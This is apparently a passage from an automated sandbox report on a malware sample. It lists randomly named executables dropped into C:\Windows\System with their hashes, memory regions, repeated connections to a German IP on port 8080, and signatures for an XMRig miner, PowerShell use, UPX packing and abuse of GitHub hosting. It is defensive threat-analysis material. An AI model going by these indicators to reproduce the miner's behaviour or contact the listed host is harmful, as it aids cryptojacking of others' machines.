C:\Windows\System\gMRJxRQ.exe

C:\Windows\System\gMRJxRQ.exe

C:\Windows\System\bqaoMnf.exe

C:\Windows\System\bqaoMnf.exe

C:\Windows\System\vEFrZtA.exe

C:\Windows\System\vEFrZtA.exe

C:\Windows\System\GtjkHUj.exe

C:\Windows\System\GtjkHUj.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2728-1-0x000000013FC10000-0x0000000140006000-memory.dmp

memory/2728-0-0x00000000001F0000-0x0000000000200000-memory.dmp

\Windows\system\yupomtJ.exe

MD5 152e95a8f3931c63c3ce71770267d8fe
SHA1 df9f83c9b69973518008f793f43b41859c7716aa
SHA256 835661e4acfb796615e7582bf1aaa29f904d89c153fb180bcbf4f01c92fbbe74
SHA512 e1be33c056848fa0b6bef756d994aacc33af170d33972f65ca68598777a7ad9684edea05bf3a1296776bbbf78e9691f16acd7f28dbcb2207ee74971c536a6043

\Windows\system\cDOLeGv.exe

MD5 8c5b9174e40567d21f29343e51e19918
SHA1 75d5e0c67be23f73db737223755061dc97c06d42
SHA256 cea3b9dcd99c42abe6eeadc8bde1b1db075dbfd483ebbb12dad17a8c1922ef09
SHA512 7043a32707906f3936acb9db66fa1e5642c74a06bfe1cb085bc0edfe46d20c12a9f4ebdef889eddfc81774bc18c482d65bdea5c37e2c0b654536bdfba84a783d

memory/2504-8-0x000000013F850000-0x000000013FC46000-memory.dmp

memory/2728-7-0x0000000003210000-0x0000000003606000-memory.dmp

memory/2728-14-0x000000013F4C0000-0x000000013F8B6000-memory.dmp

memory/2620-16-0x000000013F4C0000-0x000000013F8B6000-memory.dmp

C:\Windows\system\LJgGEqp.exe

MD5 2a166e5c5d41879599debff907719436
SHA1 53337d88a7c4d9d9d971c6e16dcef3d81956acac
SHA256 c199f1a05a059875b1f7bf31e16709a78d9fc6ddbb3fd9f09f8ee44960827ce9
SHA512 981c14f47897ba74786090991c53a4ed4e5856f15f60a76f73ade8c975e55c27ae6ddc4734ec45cd1b5c6c7a866056a2b04b37d41d09ccbdad51e99bf05011f5

memory/2728-25-0x000000013F320000-0x000000013F716000-memory.dmp

\Windows\system\dAqTYlZ.exe

MD5 8dd468b5b160216e5cded1877949d4d9
SHA1 294eb454719484a17b5ecf463c59341a2d563fd1
SHA256 246d4b0daaa3f742d83a337f2fe273a85fc763dac8414427dda852f5665e695d
SHA512 b79293c6eff52cf240577493d3b01751d40fc29f4776457b2d33d14ef41b1de91ccc20942c0ce22a3b19d25ae8ad553f7da6f9dbe78b4f0c93accf4b43a7d7b2

\Windows\system\KWLltvY.exe

MD5 a56d91d2629b2cfd166305350c46cd63
SHA1 4f578d818dd45c2b2a183acb226c08c9d8a052d8
SHA256 ea6cc720b5f0dae445c126b07d848188f36ddcbec1320bef175ffa345fe9803a
SHA512 7e6be2e0ce91d91ec068a07e77ec37dd1bf6629175fa8791a5242bef8db24d6bf63cbc8efed4c78c4423eb8dbe7c7ee5bf858491142705f06e7e2cefe17e8b9f

memory/2332-49-0x000000013FB80000-0x000000013FF76000-memory.dmp

C:\Windows\system\tnxwKcH.exe

MD5 1c29b51f2337e7a3859ba24079450854
SHA1 367421a51c19e50b2b83dbab948ffd94778f1957
SHA256 cbef6b2a2d0c03961c2c8851a7aab4c09b32e61324d579ec37eae5fb8ee4f0f9
SHA512 c328b9a1333bd4782dcc20e6c13862957d3acbfec74bb0a4769f0c8d59e409f6ea049342bced166eec92018dec5e3b0a15854a814029b3ac2b8eb1cd5b079f14

\Windows\system\YLiTgkI.exe

MD5 336dd991ef2c7558ed87711ee4bed837
SHA1 9b0ba47dc241c0ec6577edb461f70406bd42aa97
SHA256 5e4ea9d82995f576616b096b67d7a8ad1c38ca4b4b1a99e446465a0c11ee1930
SHA512 7305e200f5abefe75d8085894bfe37cdd61942a4f4c06a7c0700b83af953ce927e6054371eca525af6d1d665d2825216298b59bf2fefc3695ca0c94d028bb021

memory/2728-86-0x000000013F2D0000-0x000000013F6C6000-memory.dmp

C:\Windows\system\qJkBEMd.exe

MD5 1aceb20d026379f2fa74c05a5a4553e3
SHA1 4bc1d5ae29a2a02f698d13b096c808eb58f56145
SHA256 ea353bc7469c40670b4cc329e1626bb2f1522b6796cb93dacf7385a8256415d7
SHA512 c5a8b673f404791bcd76956d9f174d7e75f9f3215c68be684ccb9eb9d4ad419192fe58a8b38fd439103fa4976548888c2501b138a8d6fb180525bb0af6cf6084

memory/2728-108-0x0000000003210000-0x0000000003606000-memory.dmp

memory/2728-110-0x000000013F1A0000-0x000000013F596000-memory.dmp

\Windows\system\jgHvdtH.exe

MD5 8dd29c1906a050298f3122e09105c0f1
SHA1 0133a88be54b671daa36b0d912b163ce78aa047e
SHA256 a8b1070a768e45bd966e0fbd22b3910431f6939586aa4051ba205ab2db2dcbe9
SHA512 161e0fa9a9b923fa5aea1b5ec2631ecea9b1868e08366400eb12a08275abdae022f73c998dfd47c7defd5cf39eba8a7f982b06d05bd85ab89a4df7ca426da832

C:\Windows\system\gGsEamK.exe

MD5 0eff1456eca97baad9191180a1549bc1
SHA1 d586b12e5161a21991e29183bcdad9d0e764cada
SHA256 b1dfcf89ff5d65373f43979816e7abaef7bb9a0600be1d877565637a40d75fea
SHA512 fbbb25c51ba6554ed59542287ad812f9a2eeda6b95e1edf719b0dfecae3ae7c976e9436a6ef1900ad36d9c1728791c9bfc7936c4e02d9fd19b9d49ea3d5c539c

C:\Windows\system\XXQoixB.exe

MD5 ae4edbbf40db0cdee80cd09321a83668
SHA1 d64f50f7b84ecbfbf5b2035e4ba01b686e6c5d05
SHA256 a1f33f0d033e7369cee8b53a46cfce56e0acd32002202432a4f9ec4e8bef825b
SHA512 f6fad52a65b1d776546cd69f7637ec6f6a1fac4769c98fe6381da5e3a0cdc41abf19192d5c814b34a76059690cf92de691177b9489e07aa90f2e4fd4791bf930

\Windows\system\cvgWuRX.exe

MD5 591666da545608da3b49d47cdece5493
SHA1 7ad492aa793fbd8f77aaf4aed2a62f057f59ebfa
SHA256 29c681b69a050dc68f9498ead0982585ba4fb3362757c0026828af22f6b10303
SHA512 0ae93cb808e8b6a334d923e17c2fcc7038ed688562a608cbdcf660c2e83885026490d14058b1451cd5e6a2e73b845adb1ddffa0dc3319e2f74bed5a72a7ed46b

C:\Windows\system\UrsOCin.exe

MD5 ace62aaadb99a1478de5101791d8608e
SHA1 925d228b507b64a5c355fdf64802831f403daade
SHA256 6c05d524eb94fe6e77cb8bca24303270a124e6f7eb0a9b64c3576a850c2f6c5e
SHA512 c65bdc96101d6ffa0151c9f032085b27f82e38a8364c0ce0f3fc59eaa1f0994a143317f780e5902c6b8d6b9f93c17202dc26a43d2b42443d397329cdbb6c3ce0

\Windows\system\PAgnwcU.exe

MD5 d2d6fa4b3dbfcb2fc5a2f6a9fb7cba8c
SHA1 06bd4ef35543f5a17601f3fc70dc14ab8294dd3d
SHA256 50e5ca03a4f2c46091baa6424d56ac6b3b63d686e9247bda556e5c6fdac4c76b
SHA512 dd7d343044baaacc4c7a7a4223bbb34639791e00692cb4deca5045e8e078b0c394ac3bca97e1d380fca3e7fd8ae30b60bdd0fe2f3dd31dbeae9cd1f2edcafbfc

\Windows\system\huaEGBZ.exe

MD5 de161aae41d75946b1c54a330101e5f0
SHA1 a5071b31fa6848153b8145abba9c2def22a06ebc
SHA256 c3582d9796d60dd16fd585d824aa0c15d72fa87a07a2dcb219f5a05360845aff
SHA512 202ddb4d7e5e281852131b3c48690c916afb3787bd9cde864946527a7093c05e87bc82401482e5237217cc0b4645a1fd7950c69145bea7ba270176b70c77f44f

\Windows\system\PJJFhKT.exe

MD5 9e022516f6e79375e6ad76796036f9d5
SHA1 400712f72a50d4281f8c2e18a4335359c2a4b7cb
SHA256 92b6afd655c0b0b6802069efb1ba13dbf6adda3513bbcb9acf339debc110972d
SHA512 82d72f7f940cbc31004ab8096f9c8eb8cb63cb6e048e37472675a97ef6d4671bc1f74a55e13a8e51f62f8cbc95386869ff6e948dd666c98cd9590eeb6c0b87fd

C:\Windows\system\KpvwXhr.exe

MD5 60da39ce53b45f088d1412bc6698faa2
SHA1 35eb552caea5602f8d71568a2e4f8d42b1b8106e
SHA256 b536a30b783049e1a4f36298a54c34e546333e4a52dd35315a66bddd900d42f6
SHA512 b99c6f4a25358ce0b636d125630319eaa3cf866d5854acf4e116b4b3da97a6f1fee348c1ee6ec78051586acf477c3c9bed920686c2de28cbad3c264a932474c9

memory/2240-142-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

C:\Windows\system\DdjCzTZ.exe

MD5 c09899748705f3488866fd9afe0e29a8
SHA1 095fcbe49b19e1801cbe093cf20f07d2cb18b94c
SHA256 f0f4e48926cbb77d6850d3036cdc27ffffb8c5e38f2c86abf7eeaedc44282457
SHA512 808d9a3f9e368abf5e32361a843e60819621a2d2e331832ea66fd023d536f151802d48fdc9dfec0bdcd1fac56157d56fdd8220099e8a664e57d6d9a32b89a7d8

memory/2728-192-0x000000013FC10000-0x0000000140006000-memory.dmp

memory/2240-141-0x000000001B870000-0x000000001BB52000-memory.dmp

C:\Windows\system\xWwXhwV.exe

MD5 dc0c97d7e67c4d6072986f6a2ac91184
SHA1 3cc19baf9536cca98502b6e414daf38739a92ba1
SHA256 9967fb9a065ebc26feb9dd64e81c58d0429ba05277c900835efa6ffe30151f7e
SHA512 5ca43efd42f19f753d3b503c31acd22ba7b9d49c6b3dfa40cc05daf9e6bf01552dc5beeceb21f827e8710d32178a2fa007ef1d1f8c6baffdd44ef1271e837a3f

C:\Windows\system\NXIiZnN.exe

MD5 38d77365ba87a71cb4b986a767d244a2
SHA1 43de562af4ca27fc84243e6288576a49b39b542f
SHA256 7ec6bbd2519e6df355e3f7b8e81c7875d6b619056c7f05db326cc3e74cc19987
SHA512 a7c77492c1b9c632dbdbe18fc92fbe420431316a373726c00ed65dc7eb7826bec99e67ab890eef406a732dde6e1aa3fe9114237c00ad19c9bb0ca7f6d6b29b59

C:\Windows\system\SEyKTAD.exe

MD5 bbdc32042dac8aaefe90fef11eba23e7
SHA1 0ccfae5b8b69175180a6bbe79347a38f12a0f861
SHA256 fc7cbe386eeaa63bbf9c952fe26516e227c9329288ded3f183b8d36c674efd19
SHA512 d95d37de7c84a9dc3d5c69200b52501fc9aecc52f4ceb92337e13928538825d94f1d512c26691bbf779de6a72ab41d1707964c813c7588984563d2bc5ccd5ef6

C:\Windows\system\sIpBWfu.exe

MD5 ed24457eefc00c96f8668fab039b60b0
SHA1 b2be9c89a9532e7c8d4f53858e2ef1cc7cdb7f11
SHA256 b38ffae5c7fb222eb085259d41e677e117e4fc8fdec47cdd078f7fd73e4f26ac
SHA512 8b40872d661a65428d17faf122216747393787d8952ac0f063f9b177ee4df3d6dc9f9b2b77dff2fb59a68aed1c12ab009f6a71d0913488e978b14eda0bce2041

memory/2728-73-0x0000000003210000-0x0000000003606000-memory.dmp

\Windows\system\wotiXux.exe

MD5 a48f7bb1e9cb384ab2162b99488c5f6d
SHA1 a73c09108f5552e1c75f48f98fa25212e86eb39a
SHA256 707c2db40d5d81ff5147abdc27c09de901eca4dde54261e5fe767237847cbd7f
SHA512 6ef41aa003ef81e632658124a414d0626c582174d38afc88287b17ef441cbcfb174f79d7122e13bc34134b31f48d154b469d7fa1d4f0d03882df23636730fe6d

memory/2728-66-0x0000000003210000-0x0000000003606000-memory.dmp

\Windows\system\kAGTMOp.exe

MD5 ab79574e747cd30510b580c2a2d4b301
SHA1 ba6829687b55010ca67e60fc738a836bde6c5cde
SHA256 f06e38b95b9c5c2aa6711ba3d27f6ecce2d5ed60d5ca09bdf957823109bc7291
SHA512 89f27d6776278a024a61ccea0fdf2e183226e3e3a480e5015d3c131cc900a90dab31fd8f242d0b23bf72e0a6e1ca3246a27973aa1ee077556beb00cd935f00bb

memory/2728-53-0x0000000003210000-0x0000000003606000-memory.dmp

\Windows\system\nmwAqSh.exe

MD5 e656339c3cb18bc31300db50ff1a3863
SHA1 8f36a7496b6d80977b2e31c5437e2649412d85c3
SHA256 041069805a0ab6b3d3f559198208d12506a58e6521e6ade1f7aa09b4673e9f66
SHA512 44c24113f498753d74a37f499fe65fb121517ce7b3dd404b59f9f72307e82e06b484acbba1fba299b3654020b93fe65e46dd7e5500d7d52213fa3ee37c4c155f

memory/2728-43-0x0000000003210000-0x0000000003606000-memory.dmp

memory/2728-109-0x0000000003210000-0x0000000003606000-memory.dmp

memory/2036-107-0x000000013FD20000-0x0000000140116000-memory.dmp

memory/2676-106-0x000000013FBA0000-0x000000013FF96000-memory.dmp

\Windows\system\KtAqcXE.exe

MD5 c6f3011c088cf59ebcf1e0b0f9086dd1
SHA1 520d84a0d7428ae437b24881c5ec8b87d594ce61
SHA256 2a9eb41ec1b9750fed0c03e2408f4a3c0f2a3b53afba30e3a8c82e65dd717bd8
SHA512 679133fa6a2d8ee648404d391d9ee9e7a27ae1b97e8e700654ce8a92d2b0d3826009615e4197cefcde03926423bc8334c2b23f46f891596e6c38b6541edb9ded

C:\Windows\system\nmUEAuN.exe

MD5 efe3a8984c9ccadebe557fd146db53db
SHA1 96e2f2ef6b70c1fcf849d31eb7fd9a2cecb0e10c
SHA256 8710225a94ebe48c89af319047cb079614ac13790c3190fe45ae13c74a6095af
SHA512 84e4c5137821fabcbae08e95088c90e2fec22c424aecdfaf6edaa57c0e1a343d24176dd3148af794a6c4a80e51522d6eecb5d5c32cfd43a812cd2b295caa9946

C:\Windows\system\jfZlRbw.exe

MD5 3f00079aa3a8506923e169accb5a11f1
SHA1 0d57ec8fcc443e64835166f81cc07b5a2591989e
SHA256 144fc0499e1abaa056bc48fee61b33b1d2169ddcc7d44eebedeaedc6cc8bd4b8
SHA512 e41db47f8649b621aca2e03771fbd9d144551311721e14b07f82a7eed3ed916a12ff8e8b2b5a70f48ffad8cbc732566f4c736bb5448ce2133875266382b710da

memory/2504-224-0x000000013F850000-0x000000013FC46000-memory.dmp

\Windows\system\nUsIuMd.exe

MD5 3029bd43c2d3fb41dcb064d92155b9f4
SHA1 2ebdd857f409f2700501cf66d4069a7ea82fe3ea
SHA256 902577d32f9b00c4278f02488c5d4766540d5450f0a0a5ddc5e3ffac15403b2d
SHA512 234bd254d31237a48979aa4aa680a4a98be0a6a92f6eb1bb76507213390cd10cd4be15fd54405c1ebbb89a2eab173320f937f3ddde7f3b0bdd5501c76acd411b

\Windows\system\NAifKSI.exe

MD5 d7ddc4eabe61d11a92acbd2b0d5840d1
SHA1 ee245d68559fe117e5756acc76aee791e70e685f
SHA256 8f0c4778f17c9db876c7db83d7c66edb82f3054b045917dc654f28fbdcc83594
SHA512 1c64c79c88bec6a85864cbc816969892eb723458d088f474513631c9d78581a811228012cf5e8be8bf0f505779901c08c699674e69e95fa2d569fcca45397e73

\Windows\system\UPoDJvT.exe

MD5 c12f56374c27f8ca6e21202b56d9570d
SHA1 ce9290b53fb095df3f70f7d5cbe98cc965f63faa
SHA256 ea4c154aff48e042ead3204ba8b0b35e1975bff3b50a2d7576558719d55151eb
SHA512 ee33d6877d6a9037fcd4a7b3a1fc1546c9f18a633114628be31710406512aedde2ef08e03dca1e8cfa62185b9162c4fd2b716cf184a7fbceeb8464308a3c81e9

memory/2728-102-0x0000000003860000-0x0000000003C56000-memory.dmp

memory/2728-87-0x000000013F7E0000-0x000000013FBD6000-memory.dmp

C:\Windows\system\ZLPcXjo.exe

MD5 d5b916374ebc2dbeadc2fb02715dbe68
SHA1 3388d8a5aa000bf8b2c33e8badc2a9b7ef45dea7
SHA256 c4951df119e48a84c3f2676c5e45c20ff0289ae3cc10c1f19f125c27b8ac154c
SHA512 7ad7287fb63989ffd7f265e4533f2ce10b333302ea83f82e33ab94abe3b9415923d835d31356c6cd32793819eee7f2173b1d02c5c2cb1b55d858f7a9443bca9f

memory/2464-61-0x000000013F7B0000-0x000000013FBA6000-memory.dmp

memory/2728-60-0x000000013F7B0000-0x000000013FBA6000-memory.dmp

memory/2512-55-0x000000013F9F0000-0x000000013FDE6000-memory.dmp

C:\Windows\system\BIfmQuX.exe

MD5 f02a075b80d37e89d357b81f5c6b36b4
SHA1 93fb5641677481f3048800a81a3606351cc1a70a
SHA256 58cd4dec44119f6a8924b26c54f23abd8f01f8f3c094cb84fbf4ed845508a291
SHA512 9738986289635a3d34cbef62e7f93ec9e2ccd4aa316a1ae901652f5c252138e6dd7ff79a907d9813a11357a17547acd19821696de7201d9fa2ea239a7ef92c00

memory/2436-36-0x000000013FB60000-0x000000013FF56000-memory.dmp

C:\Windows\system\qpOakin.exe

MD5 56b4e4395e61401131612faada2820b7
SHA1 d6f71cca02a1eec8df3870a34d099f477bafd0f8
SHA256 f863aa87c3a3a7b637419a42a74bcf41a738a87154bea311b7cb1c2dca9637f6
SHA512 19da0e853b53a7696c1fcb84b61f0639b3f8fc2b18094b61ae8c8e8d9c933b915742a5d8003f2d24e5f7350bfd6cc1c8ca6f1b6a275088c8106d377de90e7b27

memory/2728-30-0x0000000003210000-0x0000000003606000-memory.dmp

memory/2740-29-0x000000013F320000-0x000000013F716000-memory.dmp

memory/2740-441-0x000000013F320000-0x000000013F716000-memory.dmp

memory/2436-4415-0x000000013FB60000-0x000000013FF56000-memory.dmp

memory/2512-5144-0x000000013F9F0000-0x000000013FDE6000-memory.dmp

memory/2464-6013-0x000000013F7B0000-0x000000013FBA6000-memory.dmp

memory/2728-6034-0x0000000003860000-0x0000000003C56000-memory.dmp

memory/2504-6299-0x000000013F850000-0x000000013FC46000-memory.dmp

memory/2512-6317-0x000000013F9F0000-0x000000013FDE6000-memory.dmp

memory/2464-6321-0x000000013F7B0000-0x000000013FBA6000-memory.dmp

memory/2036-6337-0x000000013FD20000-0x0000000140116000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 06:38

Reported

2024-06-14 06:41

Platform

win10v2004-20240508-en

Max time kernel

125s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\qZzUIXb.exe N/A
N/A N/A C:\Windows\System\CLGaUgU.exe N/A
N/A N/A C:\Windows\System\tlgMtuF.exe N/A
N/A N/A C:\Windows\System\JhQWmZm.exe N/A
N/A N/A C:\Windows\System\EAdLWJi.exe N/A
N/A N/A C:\Windows\System\NIVvdQi.exe N/A
N/A N/A C:\Windows\System\vgMmQOg.exe N/A
N/A N/A C:\Windows\System\hPrNWiK.exe N/A
N/A N/A C:\Windows\System\tBWjaiB.exe N/A
N/A N/A C:\Windows\System\KvLJruv.exe N/A
N/A N/A C:\Windows\System\UrQZfNg.exe N/A
N/A N/A C:\Windows\System\ykwfmKT.exe N/A
N/A N/A C:\Windows\System\dtzoVTf.exe N/A
N/A N/A C:\Windows\System\bbxCNhx.exe N/A
N/A N/A C:\Windows\System\fiucjns.exe N/A
N/A N/A C:\Windows\System\uYnVAlZ.exe N/A
N/A N/A C:\Windows\System\RiphVXj.exe N/A
N/A N/A C:\Windows\System\OUSSupJ.exe N/A
N/A N/A C:\Windows\System\NLQsayu.exe N/A
N/A N/A C:\Windows\System\GttnjHZ.exe N/A
N/A N/A C:\Windows\System\zmwDvbJ.exe N/A
N/A N/A C:\Windows\System\YnuDTWR.exe N/A
N/A N/A C:\Windows\System\tyaBnEP.exe N/A
N/A N/A C:\Windows\System\ayvBFmb.exe N/A
N/A N/A C:\Windows\System\eDnfZcH.exe N/A
N/A N/A C:\Windows\System\ErEKwag.exe N/A
N/A N/A C:\Windows\System\YnvvLfp.exe N/A
N/A N/A C:\Windows\System\noiElLe.exe N/A
N/A N/A C:\Windows\System\XOWugEG.exe N/A
N/A N/A C:\Windows\System\tMkYClM.exe N/A
N/A N/A C:\Windows\System\skatMhL.exe N/A
N/A N/A C:\Windows\System\hPKollJ.exe N/A
N/A N/A C:\Windows\System\BeTDBbX.exe N/A
N/A N/A C:\Windows\System\dVdHjeo.exe N/A
N/A N/A C:\Windows\System\hzDsboM.exe N/A
N/A N/A C:\Windows\System\pfnEwRD.exe N/A
N/A N/A C:\Windows\System\mdoEMoh.exe N/A
N/A N/A C:\Windows\System\rGeWSyt.exe N/A
N/A N/A C:\Windows\System\EKKnhiD.exe N/A
N/A N/A C:\Windows\System\vvfIRCD.exe N/A
N/A N/A C:\Windows\System\EfRErQB.exe N/A
N/A N/A C:\Windows\System\kINXrZi.exe N/A
N/A N/A C:\Windows\System\MVNWzER.exe N/A
N/A N/A C:\Windows\System\rWMLEDf.exe N/A
N/A N/A C:\Windows\System\RPLGqeC.exe N/A
N/A N/A C:\Windows\System\gjYSkHn.exe N/A
N/A N/A C:\Windows\System\yYtpszN.exe N/A
N/A N/A C:\Windows\System\ttKuKCE.exe N/A
N/A N/A C:\Windows\System\ndBPtIJ.exe N/A
N/A N/A C:\Windows\System\LvGOPZX.exe N/A
N/A N/A C:\Windows\System\hhxnMmh.exe N/A
N/A N/A C:\Windows\System\mFMCnkB.exe N/A
N/A N/A C:\Windows\System\vdUBikK.exe N/A
N/A N/A C:\Windows\System\BHzVNQZ.exe N/A
N/A N/A C:\Windows\System\qZqPLKY.exe N/A
N/A N/A C:\Windows\System\WmAzilW.exe N/A
N/A N/A C:\Windows\System\mYUAbAX.exe N/A
N/A N/A C:\Windows\System\LlCYcZo.exe N/A
N/A N/A C:\Windows\System\QvAEqtH.exe N/A
N/A N/A C:\Windows\System\BJahfOJ.exe N/A
N/A N/A C:\Windows\System\KRbMTjU.exe N/A
N/A N/A C:\Windows\System\iNUpjec.exe N/A
N/A N/A C:\Windows\System\eVJGQSy.exe N/A
N/A N/A C:\Windows\System\CieGPHX.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-shm C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-wal C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\OAEdJmE.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\BFjAXvz.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\DGXtqOn.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\cdLYPkV.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\XfwCEpv.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\qODvtOK.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\WbzxAHM.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\nZcebSY.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\hulRBKU.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\QYhAAQU.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\LNyGDUG.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\jVPwmlB.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\IlHklYk.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\WTezSyK.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\KJNmhWY.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\MsRVWJX.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\eDnfZcH.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\vUpcRkL.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZTGoUHC.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\mvmOcRY.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\spHXujm.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\RScDjyo.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
